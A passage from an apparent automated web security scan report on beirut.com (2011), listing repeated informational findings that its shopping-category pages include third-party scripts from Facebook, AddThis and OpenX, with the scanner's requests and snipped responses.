Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.678. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:20:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.679. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:44:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.680. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:29:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.681. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:34:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.682. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture-Rentals/9 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.683. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Furniture/19

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Furniture/19

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Furniture/19 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:32:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.684. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Home-Fixtures/65 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:20:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.685. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/KitchenHouse-Utensils/59 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:23:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.686. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Tapistry/50 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:29:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.687. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:42:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.688. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:31:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.689. http://www.beirut.com/Shopping/Shopping-Centers/492064852

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Shopping-Centers/492064852 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:36 GMT
